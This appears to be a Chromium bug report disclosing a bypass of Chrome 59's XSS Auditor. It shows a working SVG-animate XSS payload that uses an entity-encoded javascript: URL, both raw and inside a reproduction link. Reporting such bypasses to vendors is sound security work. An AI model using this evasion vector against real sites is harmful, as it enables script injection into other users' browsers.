UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36

Steps to reproduce the problem:
This is related to https://bugs.chromium.org/p/chromium/issues/detail?id=709365 which seems to be fixed now in Chrome 59 stable. 
But, I am able to reproduce it with by encoding any entity.

User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36

Steps to reproduce the problem:
1. Go to https://vulnerabledoma.in/char_test?body=https://vulnerabledoma.in/bypass/text?q=%3Csvg%20height%3D%271000%27%20width%3D%272000%27%3E%3Canimate%20href%3D%23unix_root%20attributeName%3Dhref%20values%3D%27%26%23106%3Bavascript%3Aalert%60%23unix_root%60%27%2F%3E%3Ca%20id%3Dunix_root%3E%3Ccircle%20r%3D2000%3E (Using same link with different payload)
2. Click the black square. JavaScript is run.

The vector is:
<svg height='1000' width='2000'><animate href=#unix_root attributeName=href values='&#106;avascript:alert`#unix_root`'/><a id=unix_root><circle r=2000>

What is the expected behavior?
It should be blocked by XSS Auditor

What went wrong?
It is not blocked by XSS Auditor

Did this work before? N/A 

Chrome version: 59.0.3071.109  Channel: stable
OS Version: Ubuntu 16.04
Flash Version: